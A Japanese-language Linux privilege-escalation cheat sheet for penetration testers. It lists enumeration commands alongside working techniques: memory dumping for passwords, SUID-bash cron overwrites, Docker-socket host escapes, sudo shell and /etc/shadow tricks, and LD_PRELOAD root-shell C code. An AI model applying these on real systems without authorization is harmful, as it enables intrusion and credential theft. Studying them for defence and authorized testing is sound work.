Linux Privilege Escalation

システム情報

OS情報

実行中のOSについての知識を得ることから始めましょう。

(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems

Path

もしあなたがPATH変数内の任意のフォルダーに書き込み権限を持っている場合、いくつかのライブラリやバイナリをハイジャックできるかもしれません:

echo $PATH

Env info

環境変数に興味深い情報、パスワード、またはAPIキーはありますか？

(env || set) 2>/dev/null

Kernel exploits

カーネルのバージョンを確認し、特権を昇格させるために使用できるエクスプロイトがあるかどうかを調べます。

cat /proc/version
uname -a
searchsploit "Linux Kernel"

良い脆弱なカーネルのリストといくつかの既にコンパイルされたエクスプロイトはここにあります: https://github.com/lucyoa/kernel-exploits と exploitdb sploits。 他にコンパイルされたエクスプロイトを見つけることができるサイト: https://github.com/bwbwbwbw/linux-exploit-binaries、https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack

そのウェブからすべての脆弱なカーネルバージョンを抽出するには、次のようにします:

curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

カーネルの脆弱性を検索するのに役立つツールは次のとおりです：

linux-exploit-suggester.sh linux-exploit-suggester2.pl linuxprivchecker.py (被害者で実行、カーネル2.xの脆弱性のみをチェック)

常にGoogleでカーネルバージョンを検索してください。おそらくあなたのカーネルバージョンがいくつかのカーネル脆弱性に記載されており、その場合、この脆弱性が有効であることが確認できます。

CVE-2016-5195 (DirtyCow)

Linux特権昇格 - Linuxカーネル <= 3.19.0-73.8

# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c

Sudoのバージョン

脆弱なsudoバージョンに基づいて、次のように表示されます：

searchsploit sudo

この grep を使用して sudo バージョンが脆弱であるかどうかを確認できます。

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

sudo < v1.28

From @sickrov

sudo -u#-1 /bin/bash

Dmesg署名検証に失敗しました

smasher2 box of HTBの例を確認して、この脆弱性がどのように悪用されるかを確認してください。

dmesg 2>/dev/null | grep "signature"

システム列挙の詳細

date 2>/dev/null #Date
(df -h || lsblk) #System stats
lscpu #CPU info
lpstat -a 2>/dev/null #Printers info

可能な防御を列挙する

AppArmor

if [ `which aa-status 2>/dev/null` ]; then
aa-status
elif [ `which apparmor_status 2>/dev/null` ]; then
apparmor_status
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
ls -d /etc/apparmor*
else
echo "Not found AppArmor"
fi

Grsecurity

((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")

PaX

(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")

Execshield

(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")

SElinux

(sestatus 2>/dev/null || echo "Not found sestatus")

ASLR

cat /proc/sys/kernel/randomize_va_space 2>/dev/null
#If 0, not enabled

Docker ブレイクアウト

もしあなたが Docker コンテナ内にいる場合、そこから脱出しようとすることができます：

ドライブ

何がマウントされていて、何がアンマウントされているか、どこで、なぜそれが行われているのかを確認してください。もし何かがアンマウントされている場合、それをマウントしてプライベート情報を確認することができるかもしれません。

ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
#Check if credentials in fstab
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null

有用なソフトウェア

有用なバイナリを列挙する

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null

また、コンパイラがインストールされているかどうかを確認してください。これは、カーネルエクスプロイトを使用する必要がある場合に便利です。使用するマシン（または類似のマシン）でコンパイルすることが推奨されます。

(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")

脆弱なソフトウェアのインストール

インストールされたパッケージとサービスのバージョンを確認してください。特権昇格に悪用される可能性のある古いNagiosのバージョンがあるかもしれません… より疑わしいインストールされたソフトウェアのバージョンを手動で確認することをお勧めします。

dpkg -l #Debian
rpm -qa #Centos

SSHアクセスがある場合、openVASを使用して、マシン内にインストールされている古いおよび脆弱なソフトウェアをチェックすることもできます。

プロセス

どのプロセスが実行されているかを確認し、権限が必要以上に高いプロセスがないかをチェックします（例えば、rootによって実行されているtomcatなど）。

ps aux
ps -ef
top -n 1

常に可能な [electron/cef/chromiumデバッガー] が実行されているか確認してください。これを悪用して特権を昇格させることができます。Linpeas はプロセスのコマンドライン内の --inspect パラメータをチェックすることでそれを検出します。 また、プロセスのバイナリに対する権限を確認してください。誰かを上書きできるかもしれません。

プロセス監視

pspy のようなツールを使用してプロセスを監視できます。これは、脆弱なプロセスが頻繁に実行されているか、特定の要件が満たされたときに特定するのに非常に役立ちます。

プロセスメモリ

サーバーの一部のサービスは、メモリ内に平文で資格情報を保存します。 通常、他のユーザーに属するプロセスのメモリを読むにはroot権限が必要です。したがって、これは通常、すでにrootであり、さらに資格情報を発見したいときにより有用です。 ただし、通常のユーザーとしては、自分が所有するプロセスのメモリを読むことができることを忘れないでください。

GDB

FTPサービスのメモリにアクセスできる場合（例えば）、ヒープを取得し、その中の資格情報を検索できます。

gdb -p <FTP_PROCESS_PID>
(gdb) info proc mappings
(gdb) q
(gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
(gdb) q
strings /tmp/mem_ftp #User and password

GDB スクリプト

#!/bin/bash
#./dump-memory.sh <PID>
grep rw-p /proc/$1/maps \
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
| while read start stop; do \
gdb --batch --pid $1 -ex \
"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \
done

/proc/$pid/maps & /proc/$pid/mem

特定のプロセスIDに対して、mapsはそのプロセスの仮想アドレス空間内でメモリがどのようにマッピングされているかを示します。また、各マッピングされた領域の権限も示します。mem擬似ファイルはプロセスのメモリ自体を公開します。mapsファイルから、どのメモリ領域が読み取り可能であるかとそのオフセットがわかります。この情報を使用して、memファイルにシークし、すべての読み取り可能な領域をファイルにダンプします。

procdump()
(
cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-"
while read a b; do
dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \
skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin"
done )
cat $1*.bin > $1.dump
rm $1*.bin
)

/dev/mem

/dev/mem はシステムの 物理 メモリへのアクセスを提供します。カーネルの仮想アドレス空間には /dev/kmem を使用してアクセスできます。 通常、/dev/mem は root と kmem グループのみに読み取り可能です。

strings /dev/mem -n10 | grep -i PASS

ProcDump for linux

ProcDumpは、WindowsのSysinternalsツールスイートからのクラシックなProcDumpツールのLinux版です。入手先はhttps://github.com/Sysinternals/ProcDump-for-Linuxです。

procdump -p 1714

ProcDump v1.2 - Sysinternals process dump utility
Copyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi
Monitors a process and writes a dump file when the process meets the
specified criteria.

Process:		sleep (1714)
CPU Threshold:		n/a
Commit Threshold:	n/a
Thread Threshold:		n/a
File descriptor Threshold:		n/a
Signal:		n/a
Polling interval (ms):	1000
Threshold (s):	10
Number of Dumps:	1
Output directory for core dumps:	.

Press Ctrl-C to end monitoring without terminating the process.

[20:20:58 - WARN]: Procdump not running with elevated credentials. If your uid does not match the uid of the target process procdump will not be able to capture memory dumps
[20:20:58 - INFO]: Timed:
[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714

ツール

プロセスのメモリをダンプするには、次のものを使用できます：

• https://github.com/Sysinternals/ProcDump-for-Linux

• https://github.com/hajzer/bash-memory-dump (root) - _ルート要件を手動で削除し、あなたが所有するプロセスをダンプできます

• https://www.delaat.net/rp/2016-2017/p97/report.pdf のスクリプト A.5 (root が必要)

プロセスメモリからの資格情報

手動の例

認証プロセスが実行中であることがわかった場合：

ps -ef | grep "authenticator"
root      2027  2025  0 11:46 ?        00:00:00 authenticator

プロセスをダンプできます（プロセスのメモリをダンプするさまざまな方法を見つけるには前のセクションを参照してください）し、メモリ内の資格情報を検索します：

./dump-memory.sh 2027
strings *.dump | grep -i password

mimipenguin

ツール https://github.com/huntergregal/mimipenguin は メモリからの平文の資格情報を盗む ことができ、いくつかの よく知られたファイル からも取得します。正しく動作するには root 権限が必要です。

Search Regexes/truffleproc

# un truffleproc.sh against your current Bash shell (e.g. $$)
./truffleproc.sh $$
# coredumping pid 6174
Reading symbols from od...
Reading symbols from /usr/lib/systemd/systemd...
Reading symbols from /lib/systemd/libsystemd-shared-247.so...
Reading symbols from /lib/x86_64-linux-gnu/librt.so.1...
[...]
# extracting strings to /tmp/tmp.o6HV0Pl3fe
# finding secrets
# results in /tmp/tmp.o6HV0Pl3fe/results.txt

Scheduled/Cron jobs

スケジュールされたジョブが脆弱であるか確認してください。もしかしたら、rootによって実行されるスクリプトを利用できるかもしれません（ワイルドカードの脆弱性？rootが使用するファイルを変更できる？シンボリックリンクを使用する？rootが使用するディレクトリに特定のファイルを作成する？）。

crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

Cron path

例えば、/etc/crontab の中に次のようなPATHが見つかります: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

(ユーザー "user" が /home/user に対して書き込み権限を持っていることに注意してください)

このcrontabの中で、rootユーザーがパスを設定せずにコマンドやスクリプトを実行しようとするとします。例えば: * * * * root overwrite.sh その場合、次のようにしてrootシェルを取得できます:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid

Cron using a script with a wildcard (Wildcard Injection)

もしrootによって実行されるスクリプトがコマンド内に“*”を含んでいる場合、これを利用して予期しないこと（例えば、権限昇格）を引き起こすことができます。例:

rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script

もしワイルドカードが /some/path/* のようなパスの前にある場合、それは脆弱ではありません（ ./* もそうです）。

次のページを読んで、他のワイルドカードの悪用テクニックを学んでください：

Cronスクリプトの上書きとシンボリックリンク

もしrootによって実行されるcronスクリプトを変更できるなら、非常に簡単にシェルを取得できます：

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p

もしrootによって実行されるスクリプトがあなたが完全にアクセスできるディレクトリを使用している場合、そのフォルダを削除し、あなたが制御するスクリプトを提供する別のフォルダへのシンボリックリンクフォルダを作成することが有用かもしれません。

ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>

定期的なcronジョブ

1分、2分、または5分ごとに実行されているプロセスを検索するためにプロセスを監視できます。これを利用して特権を昇格させることができるかもしれません。

例えば、1分間0.1秒ごとに監視し、実行回数が少ないコマンドでソートし、最も実行されたコマンドを削除するには、次のようにします:

for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

あなたはまた pspy を使用できます（これは開始されるすべてのプロセスを監視してリストします）。

見えないcronジョブ

コメントの後にキャリッジリターンを入れたcronジョブを作成することが可能です（改行文字なし）、そしてcronジョブは機能します。例（キャリッジリターン文字に注意）：

#This is a comment inside a cron config file\r* * * * * echo "Surprise!"

サービス

書き込み可能な .service ファイル

任意の .service ファイルに書き込むことができるか確認してください。できる場合は、それを 修正して サービスが 開始、再起動、または 停止 されたときに バックドアを実行 するようにすることができます（マシンが再起動されるまで待つ必要があるかもしれません）。 例えば、.service ファイル内に ExecStart=/tmp/script.sh を使ってバックドアを作成します。

書き込み可能なサービスバイナリ

サービスによって実行されるバイナリに 書き込み権限 がある場合、それらをバックドアに変更できることを念頭に置いてください。そうすれば、サービスが再実行されるとバックドアが実行されます。

systemd PATH - 相対パス

systemd によって使用される PATH は次のコマンドで確認できます：

systemctl show-environment

もし、パスのフォルダのいずれかに書き込むことができる場合、特権を昇格させることができるかもしれません。サービス構成ファイルで使用されている相対パスを探す必要があります。

ExecStart=faraday-server
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"

その後、書き込み可能なsystemd PATHフォルダー内に相対パスバイナリと同じ名前の実行可能ファイルを作成し、サービスが脆弱なアクション（Start、Stop、Reload）を実行するように求められたときに、あなたのバックドアが実行されます（特権のないユーザーは通常サービスを開始/停止できませんが、sudo -lを使用できるか確認してください）。

man systemd.serviceでサービスについて詳しく学んでください。

タイマー

タイマーは、**.service**ファイルやイベントを制御する**.timer**で終わるsystemdユニットファイルです。タイマーは、カレンダー時間イベントと単調時間イベントのサポートが組み込まれているため、cronの代替として使用でき、非同期で実行できます。

すべてのタイマーを列挙するには、次のコマンドを使用します：

systemctl list-timers --all

Writable timers

タイマーを変更できる場合、systemd.unitのいくつかの実行（.serviceや.targetなど）を実行させることができます。

Unit=backdoor.service

ドキュメントでは、ユニットが何であるかを読むことができます：

このタイマーが経過したときにアクティブにするユニット。引数はユニット名で、その接尾辞は「.timer」ではありません。指定されていない場合、この値はタイマー単位と同じ名前のサービスにデフォルト設定されます（接尾辞を除く）。（上記を参照。）アクティブにされるユニット名とタイマー単位のユニット名は、接尾辞を除いて同一の名前にすることが推奨されます。

したがって、この権限を悪用するには、次のことが必要です：

• 書き込み可能なバイナリを実行している systemd ユニット（例えば .service）を見つける

• 相対パスを実行している systemd ユニットを見つけ、systemd PATH に対して 書き込み権限 を持つ（その実行可能ファイルを偽装するため）

タイマーについて詳しくは man systemd.timer を参照してください。

タイマーの有効化

タイマーを有効にするには、root 権限が必要で、次のコマンドを実行します：

sudo systemctl enable backu2.timer
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.

Note the timer is activated by creating a symlink to it on /etc/systemd/system/<WantedBy_section>.wants/<name>.timer

Sockets

Unix Domain Sockets (UDS) は、クライアント-サーバーモデル内で同じまたは異なるマシン間のプロセス通信を可能にします。これらは、コンピュータ間通信のために標準のUnixディスクリプタファイルを利用し、.socketファイルを通じて設定されます。

ソケットは.socketファイルを使用して構成できます。

man systemd.socketでソケットについてもっと学びましょう。 このファイル内では、いくつかの興味深いパラメータを設定できます：

• ListenStream, ListenDatagram, ListenSequentialPacket, ListenFIFO, ListenSpecial, ListenNetlink, ListenMessageQueue, ListenUSBFunction: これらのオプションは異なりますが、ソケットがどこでリッスンするかを示すために要約が使用されます（AF_UNIXソケットファイルのパス、リッスンするIPv4/6および/またはポート番号など）。

• Accept: ブール引数を取ります。trueの場合、各接続ごとにサービスインスタンスが生成され、接続ソケットのみがそれに渡されます。falseの場合、すべてのリッスンソケット自体が開始されたサービスユニットに渡され、すべての接続に対して1つのサービスユニットが生成されます。この値は、単一のサービスユニットが無条件にすべての受信トラフィックを処理するデータグラムソケットおよびFIFOでは無視されます。デフォルトはfalseです。パフォーマンスの理由から、Accept=noに適した方法でのみ新しいデーモンを書くことが推奨されます。

• ExecStartPre, ExecStartPost: リッスンするソケット/FIFOがそれぞれ作成されてバインドされる前または後に実行される1つ以上のコマンドラインを取ります。コマンドラインの最初のトークンは絶対ファイル名でなければならず、その後にプロセスの引数が続きます。

• ExecStopPre, ExecStopPost: リッスンするソケット/FIFOがそれぞれ閉じられて削除される前または後に実行される追加のコマンドです。

• Service: 受信トラフィックでアクティブ化するサービスユニット名を指定します。この設定は、Accept=noのソケットにのみ許可されます。デフォルトでは、ソケットと同じ名前のサービス（サフィックスが置き換えられたもの）になります。ほとんどの場合、このオプションを使用する必要はありません。

Writable .socket files

書き込み可能な.socketファイルを見つけた場合、[Socket]セクションの最初に次のようなものを追加できます：ExecStartPre=/home/kali/sys/backdoor、これによりソケットが作成される前にバックドアが実行されます。したがって、おそらくマシンが再起動されるまで待つ必要があります。 &#xNAN;Note that the system must be using that socket file configuration or the backdoor won't be executed

Writable sockets

書き込み可能なソケットを特定した場合（ここではUnixソケットについて話しており、構成.socketファイルについてではありません）、そのソケットと通信することができ、おそらく脆弱性を悪用することができます。

Enumerate Unix Sockets

netstat -a -p --unix

生の接続

#apt-get install netcat-openbsd
nc -U /tmp/socket  #Connect to UNIX-domain stream socket
nc -uU /tmp/socket #Connect to UNIX-domain datagram socket

#apt-get install socat
socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type

悪用の例:

HTTPソケット

HTTPリクエストを待ち受けているソケットがいくつか存在する可能性があります（私は.socketファイルではなく、Unixソケットとして機能するファイルについて話しています）。これを確認するには、次のコマンドを使用できます:

curl --max-time 2 --unix-socket /pat/to/socket/files http:/index

もしソケットがHTTPリクエストで応答する場合、あなたはそれと通信でき、場合によってはいくつかの脆弱性を悪用できるかもしれません。

書き込み可能なDockerソケット

Dockerソケットは、通常/var/run/docker.sockに見られる重要なファイルであり、保護されるべきです。デフォルトでは、rootユーザーとdockerグループのメンバーが書き込み可能です。このソケットへの書き込みアクセスを持つことは、特権昇格につながる可能性があります。これを行う方法と、Docker CLIが利用できない場合の代替手段を以下に示します。

Docker CLIを使用した特権昇格

Dockerソケットへの書き込みアクセスがある場合、次のコマンドを使用して特権を昇格させることができます：

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

These commands allow you to run a container with root-level access to the host's file system.

Docker APIを直接使用する

Docker CLIが利用できない場合でも、DockerソケットはDocker APIとcurlコマンドを使用して操作できます。

1. Dockerイメージのリスト: 利用可能なイメージのリストを取得します。

curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json

1. コンテナの作成: ホストシステムのルートディレクトリをマウントするコンテナを作成するリクエストを送信します。

curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create

新しく作成したコンテナを起動します：

curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start

1. コンテナに接続: socatを使用してコンテナへの接続を確立し、その中でコマンドを実行できるようにします。

socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<NewContainerID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

socat接続を設定した後、ホストのファイルシステムに対してルートレベルのアクセスを持つコンテナ内で直接コマンドを実行できます。

その他

dockerグループの中にいるためにdockerソケットに対する書き込み権限がある場合、特権を昇格させる方法がさらにあります。もしdocker APIがポートでリスニングしている場合、あなたはそれを妥協することもできるかもしれません。

dockerから抜け出す方法やそれを悪用して特権を昇格させる方法を確認してください：

Containerd (ctr) 特権昇格

**ctr**コマンドを使用できる場合は、特権を昇格させるために悪用できるかもしれないので、以下のページを読んでください：

RunC 特権昇格

**runc**コマンドを使用できる場合は、特権を昇格させるために悪用できるかもしれないので、以下のページを読んでください：

D-Bus

D-Busは、アプリケーションが効率的に相互作用し、データを共有できるようにする高度なプロセス間通信（IPC）システムです。現代のLinuxシステムを念頭に設計されており、さまざまな形式のアプリケーション通信のための堅牢なフレームワークを提供します。

このシステムは多用途で、プロセス間のデータ交換を強化する基本的なIPCをサポートし、強化されたUNIXドメインソケットを思わせます。さらに、イベントや信号をブロードキャストするのを助け、システムコンポーネント間のシームレスな統合を促進します。たとえば、Bluetoothデーモンからの着信コールに関する信号は、音楽プレーヤーをミュートさせ、ユーザー体験を向上させることができます。加えて、D-Busはリモートオブジェクトシステムをサポートし、アプリケーション間のサービスリクエストやメソッド呼び出しを簡素化し、従来は複雑だったプロセスを効率化します。

D-Busは許可/拒否モデルで動作し、メッセージの権限（メソッド呼び出し、信号の送信など）を、ポリシールールの累積的な効果に基づいて管理します。これらのポリシーはバスとの相互作用を指定し、これらの権限を悪用することで特権昇格を可能にする場合があります。

/etc/dbus-1/system.d/wpa_supplicant.confにあるそのようなポリシーの例が提供されており、rootユーザーがfi.w1.wpa_supplicant1からメッセージを所有、送信、受信するための権限を詳細に説明しています。

ユーザーまたはグループが指定されていないポリシーは普遍的に適用され、"デフォルト"コンテキストポリシーは他の特定のポリシーにカバーされていないすべてに適用されます。

<policy user="root">
<allow own="fi.w1.wpa_supplicant1"/>
<allow send_destination="fi.w1.wpa_supplicant1"/>
<allow send_interface="fi.w1.wpa_supplicant1"/>
<allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
</policy>

D-Bus通信を列挙し、悪用する方法をここで学びましょう：

ネットワーク

ネットワークを列挙し、マシンの位置を特定することは常に興味深いです。

一般的な列挙

#Hostname, hosts and DNS
cat /etc/hostname /etc/hosts /etc/resolv.conf
dnsdomainname

#Content of /etc/inetd.conf & /etc/xinetd.conf
cat /etc/inetd.conf /etc/xinetd.conf

#Interfaces
cat /etc/networks
(ifconfig || ip a)

#Neighbours
(arp -e || arp -a)
(route || ip n)

#Iptables rules
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)

#Files used by network services
lsof -i

Open ports

常に、アクセスする前に対話できなかったマシン上で実行されているネットワークサービスを確認してください：

(netstat -punta || ss --ntpu)
(netstat -punta || ss --ntpu) | grep "127.0"

Sniffing

トラフィックをスニッフィングできるか確認してください。できる場合、いくつかの認証情報を取得できるかもしれません。

timeout 1 tcpdump

ユーザー

一般的な列挙

whoで自分が誰であるか、どのprivilegesを持っているか、システムにどのusersがいるか、どのユーザーがloginでき、どのユーザーがroot privilegesを持っているかを確認します：

#Info about me
id || (whoami && groups) 2>/dev/null
#List all users
cat /etc/passwd | cut -d: -f1
#List users with console
cat /etc/passwd | grep "sh$"
#List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
#Currently logged users
w
#Login history
last | tail
#Last log of each user
lastlog

#List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
#Current user PGP keys
gpg --list-keys 2>/dev/null

Big UID

一部のLinuxバージョンは、UID > INT_MAXを持つユーザーが特権を昇格させることを可能にするバグの影響を受けました。詳細情報: here, here と here。 Exploit it using: systemd-run -t /bin/bash

Groups

あなたがルート特権を付与する可能性のあるグループのメンバーであるか確認してください:

Clipboard

クリップボード内に興味深いものがあるか確認してください（可能であれば）。

if [ `which xclip 2>/dev/null` ]; then
echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
echo "Highlighted text: "`xclip -o 2>/dev/null`
elif [ `which xsel 2>/dev/null` ]; then
echo "Clipboard: "`xsel -ob 2>/dev/null`
echo "Highlighted text: "`xsel -o 2>/dev/null`
else echo "Not found xsel and xclip"
fi

パスワードポリシー

grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs

Known passwords

もし環境のパスワードを知っている場合は、各ユーザーとしてログインを試みてください。

Su Brute

多くのノイズを出すことを気にしない場合、suとtimeoutバイナリがコンピュータに存在するなら、su-bruteforceを使用してユーザーをブルートフォースすることができます。 Linpeasの-aパラメータを使用すると、ユーザーをブルートフォースすることも試みます。

Writable PATH abuses

$PATH

もし**$PATHのいくつかのフォルダ内に書き込むことができる**ことがわかった場合、書き込み可能なフォルダ内にバックドアを作成することによって特権を昇格させることができるかもしれません。そのバックドアは、異なるユーザー（理想的にはroot）によって実行されるコマンドの名前であり、あなたの書き込み可能なフォルダよりも前に位置するフォルダからは読み込まれない必要があります。

SUDO and SUID

sudoを使用していくつかのコマンドを実行することが許可されているか、suidビットを持っている可能性があります。それを確認するには：

sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries

いくつかの予期しないコマンドは、ファイルを読み書きしたり、コマンドを実行したりすることを可能にします。 例えば:

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
sudo tar c a.tar -I ./runme.sh a
ftp>!/bin/sh
less>! <shell_comand>

NOPASSWD

Sudoの設定により、ユーザーはパスワードを知らなくても他のユーザーの権限でいくつかのコマンドを実行できる場合があります。

$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim

この例では、ユーザー demo は root として vim を実行できます。これにより、ルートディレクトリにsshキーを追加するか、sh を呼び出すことでシェルを取得することが簡単になります。

sudo vim -c '!sh'

SETENV

このディレクティブは、ユーザーが何かを実行している間に環境変数を設定することを許可します：

$ sudo -l
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh

この例は、HTBマシンAdmirerに基づいており、スクリプトをrootとして実行する際に任意のPythonライブラリを読み込むためのPYTHONPATHハイジャックに脆弱でした：

sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh

Sudo実行バイパスパス

ジャンプして他のファイルを読むか、シンボリックリンクを使用します。例えば、sudoersファイルでは: hacker10 ALL= (root) /bin/less /var/log/*

sudo less /var/logs/anything
less>:e /etc/shadow #Jump to read other files using privileged less

ln /etc/shadow /var/log/new
sudo less /var/log/new #Use symlinks to read any file

もしワイルドカード（*）が使用されると、さらに簡単になります：

sudo less /var/log/../../etc/shadow #Read shadow
sudo less /var/log/something /etc/shadow #Red 2 files

対策: https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/

コマンドパスなしのSudoコマンド/SUIDバイナリ

sudo権限が単一のコマンドにパスを指定せずに与えられている場合: hacker10 ALL= (root) less、PATH変数を変更することでこれを悪用できます。

export PATH=/tmp:$PATH
#Put your backdoor in /tmp and name it "less"
sudo less

この技術は、suid バイナリが パスを指定せずに別のコマンドを実行する場合にも使用できます（常に奇妙な SUID バイナリの内容を strings で確認してください）。

実行するペイロードの例。

コマンドパスを持つ SUID バイナリ

もし suid バイナリが パスを指定して別のコマンドを実行する場合、その場合は、suid ファイルが呼び出しているコマンドと同名の 関数をエクスポートしてみることができます。

例えば、suid バイナリが /usr/sbin/service apache2 start を呼び出す場合、関数を作成してエクスポートする必要があります：

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service

Then, when you call the suid binary, this function will be executed

LD_PRELOAD & LD_LIBRARY_PATH

The LD_PRELOAD 環境変数は、ローダーによって他のすべてのライブラリ、標準Cライブラリ（libc.so）を含む前に読み込まれる1つ以上の共有ライブラリ（.soファイル）を指定するために使用されます。このプロセスはライブラリのプリロードとして知られています。

しかし、システムのセキュリティを維持し、この機能が悪用されるのを防ぐために、特にsuid/sgid 実行可能ファイルに対して、システムはいくつかの条件を強制します：

• ローダーは、実ユーザーID（ruid）が有効ユーザーID（euid）と一致しない実行可能ファイルに対してLD_PRELOADを無視します。

• suid/sgidの実行可能ファイルに対しては、suid/sgidでもある標準パスのライブラリのみがプリロードされます。

特権昇格は、sudoを使用してコマンドを実行する能力があり、sudo -lの出力にenv_keep+=LD_PRELOADという文が含まれている場合に発生する可能性があります。この構成により、LD_PRELOAD 環境変数が持続し、sudoでコマンドが実行されるときでも認識されるため、特権のある状態で任意のコードが実行される可能性があります。

Defaults        env_keep += LD_PRELOAD

/tmp/pe.cとして保存してください

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

次にコンパイルします:

cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

最後に、権限を昇格させる 実行中

sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}

# Compile & execute
cd /tmp
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp <COMMAND>

SUIDバイナリ – .soインジェクション

SUID権限を持つバイナリに遭遇した際に、異常に見える場合は、正しく**.so**ファイルを読み込んでいるか確認することが良い習慣です。これは、次のコマンドを実行することで確認できます:

strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"

